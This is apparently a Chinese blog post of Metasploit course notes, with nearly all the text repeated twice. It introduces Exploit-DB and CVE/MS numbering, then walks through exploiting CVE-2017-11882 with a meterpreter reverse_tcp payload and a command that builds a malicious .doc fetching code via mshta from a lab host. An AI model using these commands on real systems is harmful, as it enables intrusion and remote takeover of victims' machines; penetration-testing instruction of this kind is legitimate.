4.Metasploit框架更新

Metasploit 进阶第二讲  框架更新

 

EDB平台-互联网安全漏洞库

 

Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。

https://www.exploit-db.com/

 

exploits:漏洞信息

papers:文章

GHDB: Google hacking

shellcodes:填充数据

 

 

CVE-2017-11882介绍

CVE-2017-11882Ofice远程代码执行漏洞:

 

由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。

完美无弹窗,无异常,影响office全版本。

 

 

CVEMS

 

CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-

us/security/bulletins查找最新的各种相关信息。

由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。

 

 

MSF添加exploit及更新Metasploit框架

 

添加exploit:

1.将下载的rb文件放入对应的文件夹下

2.执行reload_all或重新启动MSF

 

更新metasploit框架:

apt update;apt install metasploit-framework

 

 

实操:利用CVE-2017-11882攻击目标主机

 

MSF:

search  2017_11882

use exploit/windows/...

info 

show options

set uripath/

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.24.137

run

 

 

生成POC程序(带有shell的doc文件):

 

python CVE-2017-11882.py  -c“mshta

http://192.168.24.137:8080/"-o11882.doc

  

其他POC程序生成:

https://github.com/Ridter/CVE-2017-11882 

python  CVE-2017-11882.py-c"cmd.exe/c

calc.cxe" –o 11882.doc

 

 

metasploit攻击win8实例

 

Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):

 

OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。

Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览器查看网页时允许远程执行任意代码。

 

可能会遇到的问题:

 

1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444) 

    lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

2.注意查看报错信息,多检索

 

 

 

 

 

metasploit框架打开方式:

 

msfconsole         启动命令行模式

armitage             启动图形化界面方式

 

Metasploit 进阶第二讲

框架更新

 

01 Exploit_db平台介绍

02 MSF添加exploit更新MSF

03 CVE-2017-11882利用实例

04合天网安实验室攻击win8实例

 

 

EDB平台-互联网安全漏洞库

 

Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。

 

https://www.exploit-db.com/

 

exploits:漏洞信息

papers:文章

GHDB: Google hacking

shellcodes:填充数据

 

 

CVE-2017-11882介绍

 

CVE-2017-11882Ofice远程代码执行漏洞:

 

Microsoft office中的公式编辑器造成,该模块以OLEObject Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。

完美无弹窗,无异常,影响office全版本。

 

 

CVEMS

 

CVECommon Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。

 

MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-

us/security/bulletins查找最新的各种相关信息。

由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html

 

MSF添加exploit及更新Metasploit框架

 

添加exploit

1.将下载的rb文件放入对应的文件夹下

2.执行reload_all或重新启动MSF

 

更新metasploit框架:

apt updateapt install metasploit-framework

 

 

实操:利用CVE-2017-11882攻击目标主机

 

MSF:

search  2017_11882

 

use exploit/windows/...

 

info

 

show options

 

set uripath/

 

set payload windows/meterpreter/reverse_tcp

 

 set lhost 192.168.24.137

 

run

 

 

生成POC程序(带有shell的doc文件):

 

python CVE-2017-11882.py  -c“mshta

 

http://192.168.24.137:8080/"-o11882.doc

 

 

 

其他POC程序生成:

 

https://github.com/Ridter/CVE-2017-11882

 

python  CVE-2017-11882.py-c"cmd.exe/c

 

calc.cxe" –o 11882.doc

 

 

 

 

 

 

 

 

 

 

 

合天网安实验室:metasploit攻击win8实例

 

Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):

 

 

OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。

Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008

SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012

Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览

器查看网页时允许远程执行任意代码。

 

 

可能会遇到的问题:

 

  1. Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)

 

lsof-i:4444  ->  kill  -9  PID(man  lsof  ->  man kill)

2.注意查看报错信息,多检索

 

 

 

 

 

metasploit框架打开方式:

 

msfconsole         启动命令行模式

 

armitage             启动图形化界面方式

 

 

 

 

posted @ 2019-07-03 20:36  DKPT  阅读(4259)  评论(0编辑  收藏  举报